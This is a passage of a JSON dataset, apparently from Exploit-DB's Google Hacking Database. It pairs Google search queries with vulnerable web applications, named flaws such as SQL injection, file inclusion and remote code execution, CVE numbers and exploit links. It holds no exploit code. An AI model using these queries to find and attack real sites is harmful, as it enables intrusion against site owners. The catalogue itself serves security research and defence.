http://www.exploit-db.com/exploits/1561" }, { "signatureReferenceNumber": "3371", "link": "https://www.exploit-db.com/ghdb/3371/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Copyright+2006-2009+Insane+Visions", "shortDescription": "Copyright 2006-2009 Insane Visions", "textualDescription": "AdaptCMS Lite 1.5 Remote File Inclusion Vulnerability: http://www.exploit-db.com/exploits/10249" }, { "signatureReferenceNumber": "3372", "link": "https://www.exploit-db.com/ghdb/3372/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+JAMM%22", "shortDescription": "\"powered by JAMM\"", "textualDescription": "JAMM CMS (id) Remote Blind SQL Injection - CVE: 2008-2755: http://www.exploit-db.com/exploits/5789" }, { "signatureReferenceNumber": "3373", "link": "https://www.exploit-db.com/ghdb/3373/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22printable_pedigree.php%22", "shortDescription": "inurl:\"printable_pedigree.php\"", "textualDescription": "Dog Pedigree Online Database 1.0.1b Multiple SQL Injection: http://www.exploit-db.com/exploits/8738" }, { "signatureReferenceNumber": "3374", "link": "https://www.exploit-db.com/ghdb/3374/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%22Powered+by+Lore+1.5.6%22", "shortDescription": "intext:\"Powered by Lore 1.5.6\"", "textualDescription": "re 1.5.6 (article.php) Blind SQL Injection: http://www.exploit-db.com/exploits/7896" }, { "signatureReferenceNumber": "3375", "link": "https://www.exploit-db.com/ghdb/3375/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+jmdcms.com%22", "shortDescription": "\"powered by jmdcms.com\"", "textualDescription": "JMD-CMS Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/15044" }, { "signatureReferenceNumber": "3376", "link": "https://www.exploit-db.com/ghdb/3376/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Driven+by+DokuWiki%22", "shortDescription": "\"Driven by DokuWiki\"", "textualDescription": "DokuWiki 2006-03-09b (dwpage.php) System Disclosure: http://www.exploit-db.com/exploits/2322" }, { "signatureReferenceNumber": "3377", "link": "https://www.exploit-db.com/ghdb/3377/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%22Powered+by+Pc4Uploader++v9.0%22", "shortDescription": "intext:\"Powered by Pc4Uploader v9.0\"", "textualDescription": "Pc4Uploader 9.0 Remote Blind SQL Injection Vulnerability - CVE: 2009-1742: http://www.exploit-db.com/exploits/8709" }, { "signatureReferenceNumber": "3379", "link": "https://www.exploit-db.com/ghdb/3379/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22copyright+2006+Broadband+Mechanics%22", "shortDescription": "\"copyright 2006 Broadband Mechanics\"", "textualDescription": "PeopleAggregator 1.2pre6-release-53 Multiple RFI Vulnerabilities - CVE: 2007-5631: http://www.exploit-db.com/exploits/4551" }, { "signatureReferenceNumber": "3380", "link": "https://www.exploit-db.com/ghdb/3380/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+shutter+v0.1.1%22", "shortDescription": "\"powered by shutter v0.1.1\"", "textualDescription": "Shutter 0.1.1 Multiple Remote SQL Injection Vulnerabilities - CVE: 2009-1650: http://www.exploit-db.com/exploits/8679" }, { "signatureReferenceNumber": "3381", "link": "https://www.exploit-db.com/ghdb/3381/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+PHP+Director+0.2%22", "shortDescription": "\"Powered by PHP Director 0.2\"", "textualDescription": "PHP Director 0.21 (sql into outfile) eval() Injection: http://www.exploit-db.com/exploits/8181" }, { "signatureReferenceNumber": "3382", "link": "https://www.exploit-db.com/ghdb/3382/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:phpinfo+intext:%22php+version%22+%2Bwindows", "shortDescription": "intitle:phpinfo intext:\"php version\" +windows", "textualDescription": "PHP 5.x COM functions safe_mode and disable_function bypass - CVE: 2007-5653: http://www.exploit-db.com/exploits/4553" }, { "signatureReferenceNumber": "3383", "link": "https://www.exploit-db.com/ghdb/3383/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22S-CMS+by+matteoiamma%22", "shortDescription": "\"S-CMS by matteoiamma\"", "textualDescription": "S-CMS 2.0b3 Multiple SQL Injection Vulnerabilities: http://www.exploit-db.com/exploits/8914" }, { "signatureReferenceNumber": "3384", "link": "https://www.exploit-db.com/ghdb/3384/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22modules/articles/index.php%3Fcat_id%3D%22", "shortDescription": "inurl:\"modules/articles/index.php?cat_id=\"", "textualDescription": "XOOPS module Articles 1.03 (index.php cat_id) SQL Injection - CVE: 2007-3311: http://www.exploit-db.com/exploits/3594" }, { "signatureReferenceNumber": "3385", "link": "https://www.exploit-db.com/ghdb/3385/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22by+Pivot+-+1.40.5%22++%2B'Dreadwind'+-pivotlog.net", "shortDescription": "\"by Pivot - 1.40.5\" +'Dreadwind' -pivotlog.net", "textualDescription": "Pivot 1.40.5 Dreamwind load_template() Credentials Disclosure - CVE: 2008-3128: http://www.exploit-db.com/exploits/5973" }, { "signatureReferenceNumber": "3386", "link": "https://www.exploit-db.com/ghdb/3386/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22PHP+Easy+Downloader%22", "shortDescription": "\"PHP Easy Downloader\"", "textualDescription": "PHP Easy Downloader 1.5 (save.php) Remote Code Execution: http://www.exploit-db.com/exploits/2812" }, { "signatureReferenceNumber": "3387", "link": "https://www.exploit-db.com/ghdb/3387/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+LoudBlog%22", "shortDescription": "\"Powered by LoudBlog\"", "textualDescription": "LoudBlog 0.5 (id) SQL Injection / Admin Credentials Disclosure - CVE: 2006-3832: http://www.exploit-db.com/exploits/2050" }, { "signatureReferenceNumber": "3392", "link": "https://www.exploit-db.com/ghdb/3392/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+visinia%22", "shortDescription": "\"Powered by visinia\"", "textualDescription": "Visinia 1.3 Multiple Vulnerabilities - http://www.exploit-db.com/exploits/14879" }, { "signatureReferenceNumber": "3395", "link": "https://www.exploit-db.com/ghdb/3395/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Splatt+Forum%C2%A9%22", "shortDescription": "\"Splatt Forum\u00a9\"", "textualDescription": "PHP-Nuke Module splattforum 4.0 RC1 Local File Inclusion - CVE: 2007-1633: http://www.exploit-db.com/exploits/3518" }, { "signatureReferenceNumber": "3396", "link": "https://www.exploit-db.com/ghdb/3396/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Seditio%22", "shortDescription": "\"Powered by Seditio\"", "textualDescription": "Seditio CMS 121 Remote SQL Injection - CVE: 2007-6202: http://www.exploit-db.com/exploits/4678" }, { "signatureReferenceNumber": "3402", "link": "https://www.exploit-db.com/ghdb/3402/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=aspWebLinks+2.0", "shortDescription": "aspWebLinks 2.0", "textualDescription": "aspWebLinks 2.0 Remote SQL Injection / Admin Pass Change - CVE: 2006-2848: http://www.exploit-db.com/exploits/1859" }, { "signatureReferenceNumber": "3406", "link": "https://www.exploit-db.com/ghdb/3406/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Burning+Board+Lite+1.0.2%22+or+%22Powered+by+Burning+Board+2.3.6%22", "shortDescription": "\"Powered by Burning Board Lite 1.0.2\" or \"Powered by Burning Board 2.3.6\"", "textualDescription": "Woltlab Burning Board 1.0.2, 2.3.6 search.php SQL Injection - CVE: 2007-0388: http://www.exploit-db.com/exploits/3143" }, { "signatureReferenceNumber": "3407", "link": "https://www.exploit-db.com/ghdb/3407/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:/webquest/soporte_derecha_w.php%3F", "shortDescription": "inurl:/webquest/soporte_derecha_w.php?", "textualDescription": "PHP Webquest 2.5 (id_actividad) Remote SQL Injection - CVE: 2007-4920: http://www.exploit-db.com/exploits/4407" }, { "signatureReferenceNumber": "3410", "link": "https://www.exploit-db.com/ghdb/3410/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%22Powered+by+pppblog%22", "shortDescription": "intext:\"Powered by pppblog\"", "textualDescription": "pppBlog 0.3.8 (randompic.php) System Disclosure - CVE: 2006-2770: http://www.exploit-db.com/exploits/1853" }, { "signatureReferenceNumber": "3411", "link": "https://www.exploit-db.com/ghdb/3411/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22printable_pedigree.php%22", "shortDescription": "inurl:\"printable_pedigree.php\"", "textualDescription": "Dog Pedigree Online Database 1.0.1b Insecure Cookie Handling: http://www.exploit-db.com/exploits/8739" }, { "signatureReferenceNumber": "3415", "link": "https://www.exploit-db.com/ghdb/3415/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+LifeType%22+%22RSS+0.90%22+%22RSS+1.0%22+%22RSS+2.0%22+%22Valid+XHTML+1.0+Strict+and+CSS%22", "shortDescription": "\"Powered by LifeType\" \"RSS 0.90\" \"RSS 1.0\" \"RSS 2.0\" \"Valid XHTML 1.0 Strict and CSS\"", "textualDescription": "LifeType 1.0.4 SQL Injection / Admin Credentials Disclosure - CVE: 2006-2857: http://www.exploit-db.com/exploits/1874" }, { "signatureReferenceNumber": "3416", "link": "https://www.exploit-db.com/ghdb/3416/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Leap%22", "shortDescription": "\"Powered by Leap\"", "textualDescription": "Leap CMS 0.1.4 (SQL/XSS/SU) Multiple Remote Vulnerabilities - CVE: 2009-1615: http://www.exploit-db.com/exploits/8577" }, { "signatureReferenceNumber": "3417", "link": "https://www.exploit-db.com/ghdb/3417/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:pmwiki.php+%2B%22Page+last+modified+on%22+|+PmWikiPhilosophy", "shortDescription": "inurl:pmwiki.php +\"Page last modified on\" | PmWikiPhilosophy", "textualDescription": "PmWiki" }, { "signatureReferenceNumber": "3418", "link": "https://www.exploit-db.com/ghdb/3418/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+UPB%22", "shortDescription": "\"Powered by UPB\"", "textualDescription": "Ultimate PHP Board 2.0 (header_simple.php) File Include - CVE: 2006-7169: http://www.exploit-db.com/exploits/2721" }, { "signatureReferenceNumber": "3420", "link": "https://www.exploit-db.com/ghdb/3420/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22BioScripts%22", "shortDescription": "\"BioScripts\"", "textualDescription": "MiniTwitter 0.2b Remote User Options Change - CVE: 2009-2574: http://www.exploit-db.com/exploits/8587" }, { "signatureReferenceNumber": "3421", "link": "https://www.exploit-db.com/ghdb/3421/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Claroline%22+-demo", "shortDescription": "\"Powered by Claroline\" -demo", "textualDescription": "Claroline" }, { "signatureReferenceNumber": "3422", "link": "https://www.exploit-db.com/ghdb/3422/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Galerie+3.2+%C3%82%C2%A9+2004+by+progressive%22", "shortDescription": "\"Galerie 3.2 \u00c2\u00a9 2004 by progressive\"", "textualDescription": "Galerie 3.2 (pic) WBB Lite Addon Blind SQL Injection - CVE: 2008-4516: http://www.exploit-db.com/exploits/6675" }, { "signatureReferenceNumber": "3423", "link": "https://www.exploit-db.com/ghdb/3423/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:sysinfo.cgi+ext:cgi", "shortDescription": "inurl:sysinfo.cgi ext:cgi", "textualDescription": "SysInfo 1.21 (sysinfo.cgi) Remote Command Execution - CVE: 2006-1831: http://www.exploit-db.com/exploits/1677" }, { "signatureReferenceNumber": "3424", "link": "https://www.exploit-db.com/ghdb/3424/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Burning+Board%22+-exploit+-johnny", "shortDescription": "\"Powered by Burning Board\" -exploit -johnny", "textualDescription": "Woltlab Burning Board Lite 1.0.2pl3e (pms.php) SQL Injection - CVE: 2007-0812: http://www.exploit-db.com/exploits/3262" }, { "signatureReferenceNumber": "3425", "link": "https://www.exploit-db.com/ghdb/3425/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Welcome+to+Exponent+CMS%22+|+%22my+new+exponent+site%22", "shortDescription": "\"Welcome to Exponent CMS\" | \"my new exponent site\"", "textualDescription": "Exponent CMS 0.96.3 (view) Remote Command Execution - CVE: 2006-4963: http://www.exploit-db.com/exploits/2391" }, { "signatureReferenceNumber": "3426", "link": "https://www.exploit-db.com/ghdb/3426/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+PMOS+Help+Desk%22", "shortDescription": "\"Powered by PMOS Help Desk\"", "textualDescription": "PMOS Help Desk 2.4 Remote Command Execution - CVE: 2007-6550: http://www.exploit-db.com/exploits/4789" }, { "signatureReferenceNumber": "3427", "link": "https://www.exploit-db.com/ghdb/3427/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+By+Pligg%22+%2B+%22Legal:+License+and+Source%22", "shortDescription": "\"Powered By Pligg\" + \"Legal: License and Source\"", "textualDescription": "Pligg 9.9.0 Remote Code Execution - CVE: 2008-7091: http://www.exploit-db.com/exploits/6172" }, { "signatureReferenceNumber": "3429", "link": "https://www.exploit-db.com/ghdb/3429/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered.by.RaidenHTTPD+%2Bintitle:index.of+|+inurl:raidenhttpd-admin", "shortDescription": "Powered.by.RaidenHTTPD +intitle:index.of | inurl:raidenhttpd-admin", "textualDescription": "RaidenHTTPD 1.1.49 (SoftParserFileXml) Remote Code Execution - CVE: 2006-4723: http://www.exploit-db.com/exploits/2328" }, { "signatureReferenceNumber": "3431", "link": "https://www.exploit-db.com/ghdb/3431/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Site+powered+By+Limbo+CMS", "shortDescription": "Site powered By Limbo CMS", "textualDescription": "Limbo CMS 1.0.4.2 Cuid cookie Blind SQL Injection - CVE: 2008-0734: http://www.exploit-db.com/exploits/5088" }, { "signatureReferenceNumber": "3432", "link": "https://www.exploit-db.com/ghdb/3432/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:naviid+%2B+inurl:liste9", "shortDescription": "inurl:naviid + inurl:liste9", "textualDescription": "Aiyoota! CMS - Blind SQL Injection: http://www.exploit-db.com/exploits/7490" }, { "signatureReferenceNumber": "3433", "link": "https://www.exploit-db.com/ghdb/3433/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22POWERED+BY+PHPNUKE.IR%22", "shortDescription": "\"POWERED BY PHPNUKE.IR\"", "textualDescription": "PHPnuke 8.2 Remote Upload File: http://www.exploit-db.com/exploits/14058" }, { "signatureReferenceNumber": "3434", "link": "https://www.exploit-db.com/ghdb/3434/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:%22com_gcalendar%22", "shortDescription": "inurl:\"com_gcalendar\"", "textualDescription": "Joomla Component com_gcalendar 1.1.2 (gcid) Remote SQL Injection Vulnerability - CVE: 2009-4099: http://www.exploit-db.com/exploits/10232" }, { "signatureReferenceNumber": "3437", "link": "https://www.exploit-db.com/ghdb/3437/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22toendaCMS+is+Free+Software+released+under+the+GNU/GPL+License.%22+|+%22powered+by+toendaCMS%22+-inurl:demo", "shortDescription": "\"toendaCMS is Free Software released under the GNU/GPL License.\" | \"powered by toendaCMS\" -inurl:demo", "textualDescription": "toendaCMS 1.0.0 (FCKeditor) Remote File Upload: http://www.exploit-db.com/exploits/2035" }, { "signatureReferenceNumber": "3438", "link": "https://www.exploit-db.com/ghdb/3438/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Powered+by+WikyBlog", "shortDescription": "Powered by WikyBlog", "textualDescription": "WikyBlog v1.7.3rc2 Multiple Vulnerabilities - CVE: 2010-0754: http://www.exploit-db.com/exploits/11560" }, { "signatureReferenceNumber": "3439", "link": "https://www.exploit-db.com/ghdb/3439/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+yourtube%22", "shortDescription": "\"powered by yourtube\"", "textualDescription": "YourTube 2.0 Arbitrary Database Disclosure: http://www.exploit-db.com/exploits/9073" }, { "signatureReferenceNumber": "3440", "link": "https://www.exploit-db.com/ghdb/3440/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+cpCommerce%22", "shortDescription": "\"Powered by cpCommerce\"", "textualDescription": "cpCommerce" }, { "signatureReferenceNumber": "3443", "link": "https://www.exploit-db.com/ghdb/3443/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22propuls%C3%83%C2%A9+par+JBlog%22", "shortDescription": "\"propuls\u00c3\u00a9 par JBlog\"", "textualDescription": "JBlog 1.0 Create / Delete Admin Authentication Bypass - CVE: 2007-3973: http://www.exploit-db.com/exploits/4211" }, { "signatureReferenceNumber": "3444", "link": "https://www.exploit-db.com/ghdb/3444/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=FhImage,+powered+by+Flash-here.com", "shortDescription": "FhImage, powered by Flash-here.com", "textualDescription": "Fhimage 1.2.1 Remote Index Change: http://www.exploit-db.com/exploits/7820" }, { "signatureReferenceNumber": "3445", "link": "https://www.exploit-db.com/ghdb/3445/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by:+Arab+Portal+v2%22", "shortDescription": "\"Powered by: Arab Portal v2\"", "textualDescription": "Arab Portal v2.x (forum.php qc) Remote SQL Injection - CVE: 2009-2781: http://www.exploit-db.com/exploits/9320" }, { "signatureReferenceNumber": "3446", "link": "https://www.exploit-db.com/ghdb/3446/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+PHP+iCalendar%22", "shortDescription": "\"Powered by PHP iCalendar\"", "textualDescription": "PHP iCalendar 2.24 (cookie_language) LFI / File Upload - CVE: 2008-5967: http://www.exploit-db.com/exploits/6519" }, { "signatureReferenceNumber": "3447", "link": "https://www.exploit-db.com/ghdb/3447/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=POWERED+BY+ALITALK", "shortDescription": "POWERED BY ALITALK", "textualDescription": "ALITALK 1.9.1.1 Multiple Remote Vulnerabilities - CVE: 2008-0371: http://www.exploit-db.com/exploits/4922" }, { "signatureReferenceNumber": "3449", "link": "https://www.exploit-db.com/ghdb/3449/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Copyright+2010.+Software+Index", "shortDescription": "Copyright 2010. Software Index", "textualDescription": "Software Index (Remote File Upload) Exploit: http://www.exploit-db.com/exploits/13999" }, { "signatureReferenceNumber": "3451", "link": "https://www.exploit-db.com/ghdb/3451/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+MDForum%22", "shortDescription": "\"Powered by MDForum\"", "textualDescription": "MDForum 2.0.1 (PNSVlang) Remote Code Execution - CVE: 2006-6869: http://www.exploit-db.com/exploits/3057" }, { "signatureReferenceNumber": "3452", "link": "https://www.exploit-db.com/ghdb/3452/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Help+*+Contact+*+Imprint+*+Sitemap%22+|+%22powered+by+papoo%22+|+%22powered+by+cms+papoo%22", "shortDescription": "\"Help * Contact * Imprint * Sitemap\" | \"powered by papoo\" | \"powered by cms papoo\"", "textualDescription": "PAPOO 3_RC3 SQL Injection/Admin Credentials Disclosure - CVE: 2006-3571: http://www.exploit-db.com/exploits/1993" }, { "signatureReferenceNumber": "3453", "link": "https://www.exploit-db.com/ghdb/3453/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+mojoPortal%22", "shortDescription": "\"Powered by mojoPortal\"", "textualDescription": "mojoportal Multiple Remote Vulnerabilities - CVE: 2010-3602: http://www.exploit-db.com/exploits/15018" }, { "signatureReferenceNumber": "3454", "link": "https://www.exploit-db.com/ghdb/3454/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:%22login+to+cacti%22", "shortDescription": "intitle:\"login to cacti\"", "textualDescription": "Cacti 0.8.6i (copy_cacti_user.php) SQL Injection: http://www.exploit-db.com/exploits/3045" }, { "signatureReferenceNumber": "3455", "link": "https://www.exploit-db.com/ghdb/3455/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22BioScripts%22", "shortDescription": "\"BioScripts\"", "textualDescription": "MiniTwitter 0.3-Beta (SQL/XSS) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/8778" }, { "signatureReferenceNumber": "3459", "link": "https://www.exploit-db.com/ghdb/3459/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+PHP+Advanced+Transfer+Manager+v1.30%22", "shortDescription": "\"Powered by PHP Advanced Transfer Manager v1.30\"", "textualDescription": "PHP Advanced Transfer Manager 1.30 Source Code Disclosure: http://www.exploit-db.com/exploits/2968" }, { "signatureReferenceNumber": "3461", "link": "https://www.exploit-db.com/ghdb/3461/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Small+Business+Manager", "shortDescription": "Small Business Manager", "textualDescription": "Plesk Small Business Manager 10.2.0 and Site Editor Multiple Vulnerabilities: http://www.exploit-db.com/exploits/15313" }, { "signatureReferenceNumber": "3462", "link": "https://www.exploit-db.com/ghdb/3462/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+webSPELL%22", "shortDescription": "\"Powered by webSPELL\"", "textualDescription": "webSPELL 4.2.0c Bypass BBCode XSS Cookie Stealing Vulnerability - CVE: 2009-1408: http://www.exploit-db.com/exploits/8453" }, { "signatureReferenceNumber": "3463", "link": "https://www.exploit-db.com/ghdb/3463/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Help+*+Contact+*+Imprint+*+Sitemap%22+|+%22powered+by+papoo%22+|+%22powered+by+cms+papoo%22", "shortDescription": "\"Help * Contact * Imprint * Sitemap\" | \"powered by papoo\" | \"powered by cms papoo\"", "textualDescription": "Papoo 3.02 (kontakt menuid) Remote SQL Injection - CVE: 2007-2320: http://www.exploit-db.com/exploits/3739" }, { "signatureReferenceNumber": "3464", "link": "https://www.exploit-db.com/ghdb/3464/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+IMGallery%22", "shortDescription": "\"Powered by IMGallery\"", "textualDescription": "IMGallery 2.5 Create Uploader Script - CVE: 2007-0082: http://www.exploit-db.com/exploits/3049" }, { "signatureReferenceNumber": "3465", "link": "https://www.exploit-db.com/ghdb/3465/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:%22Powered+by+Plogger!%22+-plogger.org", "shortDescription": "intext:\"Powered by Plogger!\" -plogger.org", "textualDescription": "Plogger Beta 2.1 Administrative Credentials Disclosure: http://www.exploit-db.com/exploits/1621" }, { "signatureReferenceNumber": "3466", "link": "https://www.exploit-db.com/ghdb/3466/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+FreeWebshop.org+2.2.1%22", "shortDescription": "\"Powered by FreeWebshop.org 2.2.1\"", "textualDescription": "FreeWebshop 2.2.1 Remote Blind SQL Injection - CVE: 2007-6466: http://www.exploit-db.com/exploits/4740" }, { "signatureReferenceNumber": "3467", "link": "https://www.exploit-db.com/ghdb/3467/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+XHP+CMS%22", "shortDescription": "\"powered by XHP CMS\"", "textualDescription": "XHP CMS 0.5 (upload) Remote Command Execution - CVE: 2006-1371: http://www.exploit-db.com/exploits/1605" }, { "signatureReferenceNumber": "3468", "link": "https://www.exploit-db.com/ghdb/3468/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22100%25+|+50%25+|+25%25%22+%22Back+to+gallery%22+inurl:%22show.php%3Fimageid%3D%22", "shortDescription": "\"100% | 50% | 25%\" \"Back to gallery\" inurl:\"show.php?imageid=\"", "textualDescription": "Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection - CVE: 2008-6988: http://www.exploit-db.com/exploits/6428" }, { "signatureReferenceNumber": "3469", "link": "https://www.exploit-db.com/ghdb/3469/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Portal+By+vbPortal+Version+3.5.0+%3C%3D+3.6.0+Beta+1", "shortDescription": "Portal By vbPortal Version 3.5.0", "textualDescription": "vbPortal 3.0.2 3.6.0 b1 (cookie) Remote Code Excution - CVE: 2006-4004: http://www.exploit-db.com/exploits/2087" }, { "signatureReferenceNumber": "3472", "link": "https://www.exploit-db.com/ghdb/3472/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Copyright+%402007+Iatek+LLC%22", "shortDescription": "\"Copyright @2007 Iatek LLC\"", "textualDescription": "PortalApp 4.0 (SQL/XSS/Auth Bypasses) Multiple Remote Vulnerabilities - CVE: 2008-4612: http://www.exploit-db.com/exploits/4848" }, { "signatureReferenceNumber": "3473", "link": "https://www.exploit-db.com/ghdb/3473/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22%26+Spider+Friendly+by+Crack%22", "shortDescription": "\"& Spider Friendly by Crack\"", "textualDescription": "phpBB Spider Friendly Module 1.3.10 File Include - CVE: 2006-5665: http://www.exploit-db.com/exploits/2686" }, { "signatureReferenceNumber": "3474", "link": "https://www.exploit-db.com/ghdb/3474/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle:%22login+to+cacti%22", "shortDescription": "intitle:\"login to cacti\"", "textualDescription": "Cacti 0.8.6i cmd.php popen() Remote Injection: http://www.exploit-db.com/exploits/3029" }, { "signatureReferenceNumber": "3475", "link": "https://www.exploit-db.com/ghdb/3475/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=Welcome+to+your+PHPOpenChat-Installation!", "shortDescription": "Welcome to your PHPOpenChat-Installation!", "textualDescription": "ADODB 4.70 (PhpOpenChat 3.0.x) Server.php SQL Injection: http://www.exploit-db.com/exploits/1652" }, { "signatureReferenceNumber": "3476", "link": "https://www.exploit-db.com/ghdb/3476/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22powered+by+TSEP+-+The+Search+Engine+Project%22", "shortDescription": "\"powered by TSEP - The Search Engine Project\"", "textualDescription": "TSEP 0.942.02 Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/9057" }, { "signatureReferenceNumber": "3477", "link": "https://www.exploit-db.com/ghdb/3477/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=WEBalbum+2004-2006+duda", "shortDescription": "WEBalbum 2004-2006 duda", "textualDescription": "WebAlbum 2.02pl COOKIE[skin2] Remote Code Execution - CVE: 2006-1480: http://www.exploit-db.com/exploits/1608" }, { "signatureReferenceNumber": "3478", "link": "https://www.exploit-db.com/ghdb/3478/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+PHP-Update%22+-site:www.php-update.co.uk", "shortDescription": "\"Powered by PHP-Update\" -site:www.php-update.co.uk", "textualDescription": "PHP-Update" }, { "signatureReferenceNumber": "3480", "link": "https://www.exploit-db.com/ghdb/3480/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+Zomplog%22", "shortDescription": "\"Powered by Zomplog\"", "textualDescription": "Zomplog 3.8.1 upload_files.php Arbitrary File Upload - CVE: 2007-5230: http://www.exploit-db.com/exploits/4466" }, { "signatureReferenceNumber": "3481", "link": "https://www.exploit-db.com/ghdb/3481/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext:\"Powered+by+simplog\"", "shortDescription": "intext:\"Powered by simplog\"", "textualDescription": "Simplog 0.9.2 (s) Remote Commands Execution - CVE: 2006-0146: http://www.exploit-db.com/exploits/1663" }, { "signatureReferenceNumber": "3482", "link": "https://www.exploit-db.com/ghdb/3482/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+SMF%22", "shortDescription": "\"Powered by SMF\"", "textualDescription": "Simple Machines Forum 1.1 rc2 local inclusion: http://www.exploit-db.com/exploits/2231" }, { "signatureReferenceNumber": "3483", "link": "https://www.exploit-db.com/ghdb/3483/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl:php-stats.js.php", "shortDescription": "inurl:php-stats.js.php", "textualDescription": "Php-Stats 0.1.9.1b (php-stats-options.php) admin 2 exec() - CVE: 2006-7173: http://www.exploit-db.com/exploits/3502" }, { "signatureReferenceNumber": "3484", "link": "https://www.exploit-db.com/ghdb/3484/", "category": "Advisories and 